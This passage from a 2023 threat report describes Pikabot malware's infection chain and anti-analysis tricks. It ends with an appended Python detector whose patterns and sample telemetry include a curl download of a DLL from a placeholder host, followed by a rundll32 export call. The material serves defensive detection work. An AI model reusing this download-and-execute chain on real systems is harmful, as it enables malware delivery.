Threat Monitor Annual Report 2023

Anti-analysis analysis and main components

The loader

One of the fascinating and frustrating things about new malware is keeping up with its changelog.

Pikabot’s two-step infection chain usually starts with a ZIP attachment to an e-mail that in most cases holds a JavaScript file (the loader itself), which executes the second stage upon user interaction. The loader type varies and may also arrive as an HTA, IMG, PDF or LNK file, which slightly changes the following steps, but the main goal remains the same: obtaining a malicious DLL and executing it. In most cases, the loader downloads the malicious DLL from an external server using the curl command. Next, the loader executes the resulting DLL with rundll32.exe, usually by calling one of its export functions. The name of the export function changes between samples and might be Crash, Enter, vips, Excpt, or something else entirely.

Pikabot has undergone many frequent and rapid changes in the past year, from the obfuscation techniques used to the actual processes executed, improving the malware’s anti-analysis and detection-evasion capabilities. The frequency of changes can be attributed both to the craftiness of threat actors always on the lookout for the best methods of avoiding detection and to the fact that Pikabot is a relatively new malware. Regardless of the driver, a steady stream of changes complicates the tracking of any malware, and here it boosts Pikabot’s evasion portfolio.

Figure 25: 1 Pikabot Infection Chain

The core module injector

The main functionalities of the injector are decrypting, injecting, and executing the core module. Later versions of the malware spawn a legitimate-looking SearchProtocolHost.exe process into which the core module is injected.

The core module usually contains anti-analysis code, specifically anti-debug and some virtual machine or sandbox checks, as well as flags for checking the user’s language to avoid infecting victims in Commonwealth of Independent States (CIS) countries, depending on the operator.

In even newer samples, SearchFilterHost.exe is used instead.
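As an added illustration (not part of the report), the following Python flags the loader-to-injector chain described in the two sections above in process-creation telemetry; the event field names, the rule names and the sample events are assumptions constructed for this example.

```python
import re

# Script hosts that run the JavaScript/HTA loader described above
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Export names the report says the loader invokes through rundll32.exe
KNOWN_EXPORTS = {"crash", "enter", "vips", "excpt"}
# Legitimate Windows Search binaries the report names as injection targets
SEARCH_HOSTS = {"searchprotocolhost.exe", "searchfilterhost.exe"}
# rundll32 <path>.dll,<export>  (quotes around the path are optional)
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",\s]+\.dll)"?\s*,\s*(\w+)', re.I)

def detect_pikabot_chain(events):
    """Return (rule, pid) findings over process-creation events.

    Each event is a dict with "pid", "ppid", "image" (basename) and
    "cmdline"; these field names are an assumption of this example.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = e["image"].lower()
        parent = by_pid.get(e["ppid"], {}).get("image", "").lower()
        # Stage 1: the script-host loader pulls the DLL with curl
        if image == "curl.exe" and parent in SCRIPT_HOSTS:
            findings.append(("loader_curl_download", e["pid"]))
        # Stage 2: rundll32 calls an export of the downloaded DLL; flag a
        # known export name or any rundll32 launched straight from a script host
        elif image == "rundll32.exe":
            m = RUNDLL_RE.search(e["cmdline"])
            if m and (m.group(2).lower() in KNOWN_EXPORTS or parent in SCRIPT_HOSTS):
                findings.append(("rundll32_export_call", e["pid"]))
        # Stage 3: the injector spawns a Search host to receive the core module
        elif image in SEARCH_HOSTS and parent == "rundll32.exe":
            findings.append(("search_host_injection_target", e["pid"]))
    return findings

# Constructed telemetry for the chain above plus one benign rundll32 use;
# paths and the URL are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "wscript.exe", "cmdline": "wscript.exe invoice.js"},
    {"pid": 101, "ppid": 100, "image": "curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\x.dll http://example.invalid/x"},
    {"pid": 102, "ppid": 100, "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Users\\Public\\x.dll,Crash"},
    {"pid": 103, "ppid": 102, "image": "SearchProtocolHost.exe", "cmdline": "SearchProtocolHost.exe"},
    {"pid": 200, "ppid": 1, "image": "rundll32.exe", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]
```

Parent lookup only spans the events passed in, so feed it a window wide enough to contain the script host that started the chain.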
